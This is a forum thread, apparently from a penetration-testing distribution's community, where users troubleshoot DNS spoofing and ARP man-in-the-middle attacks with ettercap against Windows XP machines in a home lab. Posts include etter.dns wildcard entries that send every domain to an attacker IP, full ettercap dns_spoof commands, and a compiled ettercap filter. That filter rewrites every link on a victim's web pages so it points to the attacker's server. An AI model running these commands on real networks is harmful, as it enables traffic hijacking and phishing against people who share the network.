Results 1 to 6 of 6

Thread: Dns Spoofing and ettercap [not working ?]

  1. #1
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    4

    Unhappy Dns Spoofing and ettercap [not working ?]

    Well as you see I'm new here ,after reading a lot of threads in this forum (I like to use the search option before posting )
    After about 2 weeks with that problem , and with no solution I've decided to post here my problem.
    Now maybe I didn't searched well (which I don't think so .. correct me if I'm wrong) but anyway here is my problem.
    First of all to clears thing out , I test and try everything in my small "Lab"
    My attacker laptop is running BT4PF .
    My victim laptop is running Windows XP SP3 .
    Well my problem is that :
    I've tried to do DNS spoofing on my victim laptop , and it just won't work,
    The victim continue to surf like I didn't tried anything :P
    Now I've searched about it in this Great forum (and I mean it !) and in google,
    I didn't find any solution ..
    I have to say that the ARP spoofing attack worked fine !
    But when its Spoofed it only inserted my code in a small part at the top of the site , and I don't want that , I want it to be on all the browser screen.
    This is why I choose DNS Spoofing which redirect any request of the victim to my machine (which is running an apache server , and nicely configured index.html )

    What I've done was that :
    First edited the :
    /user/share/ettercap/etter.dns
    I've inserted there :
    * A 192.168.168.xxx (attacker IP)
    And started the ettercap dns attack with the command :
    ettercap -T -q -i wlan0 -P dns_spoof -M arp /target1/ /target2/
    ..It didn't worked ,
    I tried to change the dns.conf with this example from the internet (just to test):
    cnn.com A 212.58.224.138
    *.cnn.com A 212.58.224.138
    It didn't worked either ..
    What I did wrong ?
    Please Help me solve this..
    Thank you for reading , and I'll appreciate ANY help.
    Sil3nce.

  2. #2
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    4

    Default

    -- O.o double post ? -- the post below is the correct one .. --

  3. #3
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    4

    Default

    Well I found a nice solution but its still not what I need.
    The solution is to use ettercap filter to redirect any link to my attack machine.
    Simply , I found a nice tutorial of BigMac which I used
    The tutorial is here :hxxp://forums.remote-exploit.org/tutorials-guides/15551-fast-track-mass-client-attck-ettercap.html

    What I did was :

    first create new filter :

    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
    	  # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("a href=", "a href=\"hxxp://192.168.168.xxx\" ");
       replace("a href=", "a href=\"hxxp://192.168.168.xxx\" ");
       msg("Filter Ran.\n");
    }
    Then :

    Code:
    ettercap filter.filter filter.ef
    And in the same folder :

    Code:
    ettercap -T -q -i wlan0-F filter.ef -M ARP /target1/ /target2/
    It is working but I'm interested in DNS spoofing so if anyone can help me solve my problem , I'll appreciate that .
    Thank you.
    Sil3nce.

  4. #4
    mcurran
    Guest

    Default

    sil3nce:

    Can you still confirm the redirect filter is working on the XP [SP3] machine? I have a XP [SP3] VM inside my BT4 HD install, but neither IE8 or Firefox show any affect from targeted ettercap filters from the host. All my other targets get redirected, but not the XP machine for some reason. Maybe it's a new update with XP [SP3], but I'm not sure. Anyone else know why this updated OS is not being affected? I'm going to try DNS spoofing and I'll come back and confirm whether or not that works two...

  5. #5
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    /
    Posts
    16

    Default

    Try

    cd /usr/share/ettercap/
    mv -f etter.dns etter.dns.old
    kate etter.dns
    * A 192.168.1.7 (attacker IP)

    Then run

    ettercap -i wlan0 -T -q -P dns_spoof -M ARP /gateway IP/ /Victim IP/

    You will also need to have apache running with your fake web page what you want to be displayed

    Hope this helps

  6. #6
    mcurran
    Guest

    Default

    Quote Originally Posted by W@r~l0RD View Post
    Try

    cd /usr/share/ettercap/
    mv -f etter.dns etter.dns.old
    kate etter.dns
    * A 192.168.1.7 (attacker IP)

    Then run

    ettercap -i wlan0 -T -q -P dns_spoof -M ARP /gateway IP/ /Victim IP/

    You will also need to have apache running with your fake web page what you want to be displayed

    Hope this helps
    Yes, I already have my index.html dummy page and I have it working. I also have *.*.*.* A 192.168.1.2 (LHOST IP), in my etter.conf, which is essentially the same thing. I know my setup works, because I can test it on all my other test client machines (targets), but for some reason IE8 and Firefox don't get redirected on my XP Service Pack 3 (virtual guest). Their displayed pages get all messed up and sometimes fail to load, but they never get redirected like the other targets, which all seem to work very smoothly. It even works when I go to my own IP to test from the LHOST machine.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •